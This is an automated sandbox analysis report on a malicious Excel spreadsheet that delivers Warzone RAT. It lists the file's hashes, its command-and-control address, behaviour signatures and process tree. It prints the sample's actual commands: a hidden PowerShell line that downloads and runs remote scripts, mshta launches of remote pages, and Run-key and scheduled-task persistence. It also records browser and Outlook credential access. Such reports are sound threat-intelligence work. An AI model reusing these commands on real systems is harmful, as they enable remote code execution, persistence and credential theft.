Analysis
-
max time kernel
134s -
max time network
152s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
25-10-2021 19:19
Static task
static1
Behavioral task
behavioral1
Sample
Dues Schedule.xls
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
Dues Schedule.xls
Resource
win10-en-20210920
General
-
Target
Dues Schedule.xls
-
Size
35KB
-
MD5
2cd1c85653a455037cc06e28f618cadd
-
SHA1
1c73eecf53204098c00396764f440e94e226e85f
-
SHA256
f76a6159bfa4a475f623a5969e9ed6f83dc9ba382a0a0e39332507fca8fc06b8
-
SHA512
0e6a0eaea95e27be9cee58300c99199bdb307e63672ee68dcc518974014e0a06bd6f9a5ee79df2353d2a99af4f1df54e94e2d08417490bc1912d1d5435426b2b
Malware Config
Extracted
warzonerat
mobibagugu.duckdns.org:666
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
mshta.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3892 4332 mshta.exe EXCEL.EXE -
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
-
Warzone RAT Payload 4 IoCs
Processes:
resource yara_rule behavioral2/memory/2700-294-0x0000000000405CE2-mapping.dmp warzonerat behavioral2/memory/2700-347-0x0000000000400000-0x0000000000554000-memory.dmp warzonerat behavioral2/memory/4312-357-0x0000000000405CE2-mapping.dmp warzonerat behavioral2/memory/4312-361-0x0000000000400000-0x0000000000554000-memory.dmp warzonerat -
Blocklisted process makes network request 11 IoCs
Processes:
mshta.exepowershell.exeflow pid process 38 3892 mshta.exe 39 3892 mshta.exe 41 3892 mshta.exe 43 3892 mshta.exe 45 3892 mshta.exe 47 3892 mshta.exe 48 3892 mshta.exe 50 3892 mshta.exe 51 3892 mshta.exe 53 3580 powershell.exe 55 3892 mshta.exe -
Loads dropped DLL 6 IoCs
Processes:
RegAsm.exepid process 4312 RegAsm.exe 4312 RegAsm.exe 4312 RegAsm.exe 4312 RegAsm.exe 4312 RegAsm.exe 4312 RegAsm.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 2 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe -
Adds Run key to start application 2 TTPs 5 IoCs
Processes:
mshta.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\takeCare = "pOweRshell.exe -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://deb43e46-145f-4ebd-abfb-69a78b67bacf.usrfiles.com/ugd/deb43e_3d44c8ea9dbe45318db54d48544bb3ba.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://deb43e46-145f-4ebd-abfb-69a78b67bacf.usrfiles.com/ugd/deb43e_1ca536be36694083825be7a38e59be83.txt').GetResponse().GetResponseStream()).ReadToend());" mshta.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\SAFEsounkkkd = "\"MsHta\"\"http://1230948%1230948@migimigichuchuchacha.blogspot.com/p/22.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Milalaasdasdlalal = "\"MsHta\"\"http://1230948%1230948@gagamutakakachota.blogspot.com/p/22.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cleanreasdasdddsults = "\"MsHta\"\"http://1230948%1230948@machearkalonikahdi.blogspot.com/p/22.html\"" mshta.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.exedescription pid process target process PID 3580 set thread context of 2700 3580 powershell.exe jsc.exe PID 3580 set thread context of 4312 3580 powershell.exe RegAsm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 3756 taskkill.exe 3340 taskkill.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 4332 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
dw20.exepowershell.exepid process 4124 dw20.exe 4124 dw20.exe 3580 powershell.exe 3580 powershell.exe 3580 powershell.exe 3580 powershell.exe 3580 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
taskkill.exetaskkill.exepowershell.exedescription pid process Token: SeDebugPrivilege 3340 taskkill.exe Token: SeDebugPrivilege 3756 taskkill.exe Token: SeDebugPrivilege 3580 powershell.exe -
Suspicious use of SetWindowsHookEx 11 IoCs
Processes:
EXCEL.EXEjsc.exeRegAsm.exepid process 4332 EXCEL.EXE 4332 EXCEL.EXE 4332 EXCEL.EXE 4332 EXCEL.EXE 4332 EXCEL.EXE 4332 EXCEL.EXE 4332 EXCEL.EXE 4332 EXCEL.EXE 4332 EXCEL.EXE 2700 jsc.exe 4312 RegAsm.exe -
Suspicious use of WriteProcessMemory 41 IoCs
Processes:
EXCEL.EXEmshta.exepowershell.execsc.exedescription pid process target process PID 4332 wrote to memory of 3892 4332 EXCEL.EXE mshta.exe PID 4332 wrote to memory of 3892 4332 EXCEL.EXE mshta.exe PID 3892 wrote to memory of 3340 3892 mshta.exe taskkill.exe PID 3892 wrote to memory of 3340 3892 mshta.exe taskkill.exe PID 3892 wrote to memory of 3756 3892 mshta.exe taskkill.exe PID 3892 wrote to memory of 3756 3892 mshta.exe taskkill.exe PID 3892 wrote to memory of 3580 3892 mshta.exe powershell.exe PID 3892 wrote to memory of 3580 3892 mshta.exe powershell.exe PID 3892 wrote to memory of 4928 3892 mshta.exe schtasks.exe PID 3892 wrote to memory of 4928 3892 mshta.exe schtasks.exe PID 3892 wrote to memory of 4124 3892 mshta.exe dw20.exe PID 3892 wrote to memory of 4124 3892 mshta.exe dw20.exe PID 3580 wrote to memory of 2224 3580 powershell.exe jsc.exe PID 3580 wrote to memory of 2224 3580 powershell.exe jsc.exe PID 3580 wrote to memory of 2224 3580 powershell.exe jsc.exe PID 3580 wrote to memory of 2700 3580 powershell.exe jsc.exe PID 3580 wrote to memory of 2700 3580 powershell.exe jsc.exe PID 3580 wrote to memory of 2700 3580 powershell.exe jsc.exe PID 3580 wrote to memory of 2700 3580 powershell.exe jsc.exe PID 3580 wrote to memory of 2700 3580 powershell.exe jsc.exe PID 3580 wrote to memory of 2700 3580 powershell.exe jsc.exe PID 3580 wrote to memory of 2700 3580 powershell.exe jsc.exe PID 3580 wrote to memory of 2700 3580 powershell.exe jsc.exe PID 3580 wrote to memory of 2700 3580 powershell.exe jsc.exe PID 3580 wrote to memory of 2700 3580 powershell.exe jsc.exe PID 3580 wrote to memory of 2700 3580 powershell.exe jsc.exe PID 3580 wrote to memory of 3244 3580 powershell.exe csc.exe PID 3580 wrote to memory of 3244 3580 powershell.exe csc.exe PID 3244 wrote to memory of 4104 3244 csc.exe cvtres.exe PID 3244 wrote to memory of 4104 3244 csc.exe cvtres.exe PID 3580 wrote to memory of 4312 3580 powershell.exe RegAsm.exe PID 3580 wrote to memory of 4312 3580 powershell.exe RegAsm.exe PID 3580 wrote to memory of 4312 3580 powershell.exe RegAsm.exe PID 3580 wrote to memory of 4312 3580 powershell.exe RegAsm.exe PID 3580 wrote to memory of 4312 3580 powershell.exe RegAsm.exe PID 3580 wrote to memory of 4312 3580 powershell.exe RegAsm.exe PID 3580 wrote to memory of 4312 3580 powershell.exe RegAsm.exe PID 3580 wrote to memory of 4312 3580 powershell.exe RegAsm.exe PID 3580 wrote to memory of 4312 3580 powershell.exe RegAsm.exe PID 3580 wrote to memory of 4312 3580 powershell.exe RegAsm.exe PID 3580 wrote to memory of 4312 3580 powershell.exe RegAsm.exe -
outlook_office_path 1 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe -
outlook_win_path 1 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Dues Schedule.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\mshta.exemshta https://www.bitly.com/kddjkkdkdwodkwokdwi2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im winword.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im Excel.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://deb43e46-145f-4ebd-abfb-69a78b67bacf.usrfiles.com/ugd/deb43e_3d44c8ea9dbe45318db54d48544bb3ba.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://deb43e46-145f-4ebd-abfb-69a78b67bacf.usrfiles.com/ugd/deb43e_1ca536be36694083825be7a38e59be83.txt').GetResponse().GetResponseStream()).ReadToend());3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"4⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cwjgbosh\cwjgbosh.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFB0A.tmp" "c:\Users\Admin\AppData\Local\Temp\cwjgbosh\CSC1BDAB2F2D6DD40D5973D46538973859B.TMP"5⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr ""\""MsHtA""\""http://1230948%1230948@kumakahchachi.blogspot.com/p/22.html\""3⤵
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 29523⤵
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RESFB0A.tmpMD5
083051eb5736a634029ac0d4b944d748
SHA13dd46202743f5972ef35429ad56f5cc97d53b041
SHA2565838bfc8deca125ff558be50593e9194fbc3257943992baec23540c029acbd47
SHA512fab90c43338075a1eac89e47157b10f6edd9de82e7afe54807102b8856dafa6f62e0688f84db9d9ef54b61395233b68b7c59b12e17480aa3e23597b1a866daf4
-
C:\Users\Admin\AppData\Local\Temp\cwjgbosh\cwjgbosh.dllMD5
1d5d4219ba66c6e754677b4a8f0cc5ee
SHA1d6e9f07e1e0f165b36a98f131af28876e204e923
SHA256f24461735f1cdbb839b24a74c605f99cdac9412f3fb700ed5e9b77d33f00b142
SHA512e705f0be118f3f0c842d0f8df073920cc0528d25b677a56411c0ff938d5ca6498ce8b137e853533714633e2537098e051498f975ade72d65b2dd706df12935ff
-
\??\c:\Users\Admin\AppData\Local\Temp\cwjgbosh\CSC1BDAB2F2D6DD40D5973D46538973859B.TMPMD5
d74822c5546f35e6211bd6599ab07ae3
SHA1b27b723e3618f2164ba43b4eede581e5a9733a32
SHA2562bd2ae17c9f4a448f4ec152f5952606b1e4f931eb10e35fb4c3a14286c8c37a5
SHA512b0e8949ecd799225b10799b090153b0fcf3e86be3a9c7764c268a2195bb3d2b555032b83ecf09b90d1bae458625af8d603db66732a9dc825090b63b434b537dd
-
\??\c:\Users\Admin\AppData\Local\Temp\cwjgbosh\cwjgbosh.0.csMD5
e03b1e7ba7f1a53a7e10c0fd9049f437
SHA13bb851a42717eeb588eb7deadfcd04c571c15f41
SHA2563ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427
SHA512a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f
-
\??\c:\Users\Admin\AppData\Local\Temp\cwjgbosh\cwjgbosh.cmdlineMD5
afe9c97d800de615f0e26d1d99a6b48c
SHA1dd1f6bc3d25541ad5536d9751c9c2d52c9068414
SHA2569b7cce0a3c2385b7e34c9162168663ac9456c7e572aa2015f2c428f6eed4e494
SHA51280c9c1001eae0b0f3672f282c75ba3751b2addaa01d5c7952a0887304e7707c69e6830d2b7b2a80d142e601cc34e0a31d0e8857c3edb40ab5dda399237930a25
-
\Users\Admin\AppData\Local\Temp\freebl3.dllMD5
ef12ab9d0b231b8f898067b2114b1bc0
SHA16d90f27b2105945f9bb77039e8b892070a5f9442
SHA2562b00fc4f541ac10c94e3556ff28e30a801811c36422546a546a445aca3f410f7
SHA5122aa62bfba556ad8f042942dd25aa071ff6677c257904377c1ec956fd9e862abcbf379e0cfd8c630c303a32ece75618c24e3eef58bddb705c427985b944689193
-
\Users\Admin\AppData\Local\Temp\mozglue.dllMD5
75f8cc548cabf0cc800c25047e4d3124
SHA1602676768f9faecd35b48c38a0632781dfbde10c
SHA256fb419a60305f17359e2ac0510233ee80e845885eee60607715c67dd88e501ef0
SHA512ed831c9c769aef3be253c52542cf032afa0a8fa5fe25ca704db65ee6883c608220df7102ac2b99ee9c2e599a0f5db99fd86894a4b169e68440eb1b0d0012672f
-
\Users\Admin\AppData\Local\Temp\msvcp140.dllMD5
109f0f02fd37c84bfc7508d4227d7ed5
SHA1ef7420141bb15ac334d3964082361a460bfdb975
SHA256334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4
SHA51246eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39
-
\Users\Admin\AppData\Local\Temp\nss3.dllMD5
d7858e8449004e21b01d468e9fd04b82
SHA19524352071ede21c167e7e4f106e9526dc23ef4e
SHA25678758bf7f3b3b5e3477e38354acd32d787bc1286c8bd9b873471b9c195e638db
SHA5121e2c981e6c0ca36c60c6e9cae9548b866d5c524df837095b30d618d9c322def7134c20de820105400dd1b58076b66d90274f67773ac6ba914f611b419babb440
-
\Users\Admin\AppData\Local\Temp\softokn3.dllMD5
471c983513694ac3002590345f2be0da
SHA16612b9af4ff6830fa9b7d4193078434ef72f775b
SHA256bb3ff746471116c6ad0339fa0522aa2a44a787e33a29c7b27649a054ecd4d00f
SHA512a9b0fb923bc3b567e933de10b141a3e9213640e3d790b4c4d753cf220d55593ae8026102909969ba6bfc22da3b2fcd01e30a9f5a74bd14a0fdec9beaf0fb1410
-
\Users\Admin\AppData\Local\Temp\vcruntime140.dllMD5
7587bf9cb4147022cd5681b015183046
SHA1f2106306a8f6f0da5afb7fc765cfa0757ad5a628
SHA256c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d
SHA5120b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f
-
memory/2700-358-0x0000000004440000-0x000000000457C000-memory.dmpFilesize
1.2MB
-
memory/2700-294-0x0000000000405CE2-mapping.dmp
-
memory/2700-347-0x0000000000400000-0x0000000000554000-memory.dmpFilesize
1.3MB
-
memory/3244-348-0x0000000000000000-mapping.dmp
-
memory/3340-265-0x0000000000000000-mapping.dmp
-
memory/3580-282-0x000001ACF9D03000-0x000001ACF9D05000-memory.dmpFilesize
8KB
-
memory/3580-281-0x000001ACF9D00000-0x000001ACF9D02000-memory.dmpFilesize
8KB
-
memory/3580-289-0x000001ACF9D06000-0x000001ACF9D08000-memory.dmpFilesize
8KB
-
memory/3580-267-0x0000000000000000-mapping.dmp
-
memory/3756-266-0x0000000000000000-mapping.dmp
-
memory/3892-263-0x0000000000000000-mapping.dmp
-
memory/4104-351-0x0000000000000000-mapping.dmp
-
memory/4124-269-0x0000000000000000-mapping.dmp
-
memory/4312-361-0x0000000000400000-0x0000000000554000-memory.dmpFilesize
1.3MB
-
memory/4312-363-0x0000000003BE0000-0x0000000003C64000-memory.dmpFilesize
528KB
-
memory/4312-357-0x0000000000405CE2-mapping.dmp
-
memory/4312-362-0x0000000003980000-0x0000000003ABC000-memory.dmpFilesize
1.2MB
-
memory/4332-122-0x000001F94BBC0000-0x000001F94BBC2000-memory.dmpFilesize
8KB
-
memory/4332-115-0x00007FFBD7680000-0x00007FFBD7690000-memory.dmpFilesize
64KB
-
memory/4332-120-0x000001F94BBC0000-0x000001F94BBC2000-memory.dmpFilesize
8KB
-
memory/4332-121-0x000001F94BBC0000-0x000001F94BBC2000-memory.dmpFilesize
8KB
-
memory/4332-119-0x00007FFBD7680000-0x00007FFBD7690000-memory.dmpFilesize
64KB
-
memory/4332-118-0x00007FFBD7680000-0x00007FFBD7690000-memory.dmpFilesize
64KB
-
memory/4332-117-0x00007FFBD7680000-0x00007FFBD7690000-memory.dmpFilesize
64KB
-
memory/4332-116-0x00007FFBD7680000-0x00007FFBD7690000-memory.dmpFilesize
64KB
-
memory/4928-268-0x0000000000000000-mapping.dmp